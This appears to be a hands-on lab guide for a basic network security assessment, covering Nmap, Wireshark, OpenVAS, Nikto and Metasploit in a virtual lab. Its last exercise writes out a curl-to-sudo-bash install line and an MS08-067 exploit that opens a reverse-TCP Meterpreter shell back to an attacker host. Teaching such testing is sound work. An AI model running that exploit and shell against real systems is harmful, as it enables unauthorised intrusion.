Network security is crucial for protecting an organization's data and resources from unauthorized access and cyber threats. This project will guide you through a basic network security assessment, focusing on identifying common vulnerabilities in network configurations. You will use various tools to scan, analyze, and secure your network.
- Basic understanding of networking concepts (IP addresses, subnets, routers, etc.)
- Familiarity with the Linux command line
- A computer with a Linux operating system (preferably Ubuntu)
- Internet connection to download necessary tools
- Lab Environment: A virtualized network setup using VirtualBox or VMware with at least two virtual machines (one as a target and one as an attacker).
- Tools:
- Nmap
- Wireshark
- OpenVAS
- Nikto
- Metasploit
Objective: Identify live hosts and open ports on the target network.
Steps:
-
Install Nmap:
sudo apt-get update sudo apt-get install nmap
-
Scan the Network:
nmap -sn 192.168.1.0/24
- This command performs a ping scan to identify live hosts.
-
Identify Open Ports:
nmap -sS 192.168.1.10
- Replace
192.168.1.10with the IP address of a live host found in the previous step.
- Replace
Expected Output:
- List of live hosts in the network.
- Open ports on the specified host.
Objective: Capture and analyze network traffic to identify potential security issues.
Steps:
-
Install Wireshark:
sudo apt-get install wireshark
-
Capture Network Traffic:
- Open Wireshark.
- Select the network interface to capture traffic.
- Click on the "Start" button to begin capturing packets.
-
Analyze Captured Traffic:
- Look for suspicious traffic such as repeated requests, unusual protocols, or large data transfers.
Expected Output:
- Capture file with network traffic data.
- Identification of any suspicious traffic patterns.
Objective: Perform a vulnerability scan on the target network to identify known vulnerabilities.
Steps:
-
Install OpenVAS:
sudo apt-get install openvas sudo openvas-setup
-
Configure and Start OpenVAS:
- Access the OpenVAS web interface (usually at
https://localhost:9392). - Login with the admin credentials created during setup.
- Access the OpenVAS web interface (usually at
-
Run a Vulnerability Scan:
- Create a new scan task.
- Set the target IP address range.
- Start the scan and wait for it to complete.
Expected Output:
- Report detailing identified vulnerabilities and their severity.
Objective: Assess a web server for common vulnerabilities using Nikto.
Steps:
-
Install Nikto:
sudo apt-get install nikto
-
Scan the Web Server:
nikto -h http://192.168.1.10
- Replace
192.168.1.10with the IP address of the target web server.
- Replace
Expected Output:
- Report detailing potential vulnerabilities, misconfigurations, and other issues with the web server.
Objective: Use Metasploit to exploit a vulnerability identified in previous exercises.
Steps:
-
Install Metasploit:
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/msfupdate | sudo bash -
Launch Metasploit Console:
msfconsole
-
Select and Configure an Exploit:
use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.1.10 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.20 run
- Replace
192.168.1.10with the target IP address. - Replace
192.168.1.20with the attacker's IP address.
- Replace
Expected Output:
- Successful exploitation will open a Meterpreter session on the target machine.
By completing these exercises, you have learned how to identify and assess common network security vulnerabilities using various tools. This knowledge is fundamental for performing more advanced security assessments and protecting network infrastructures.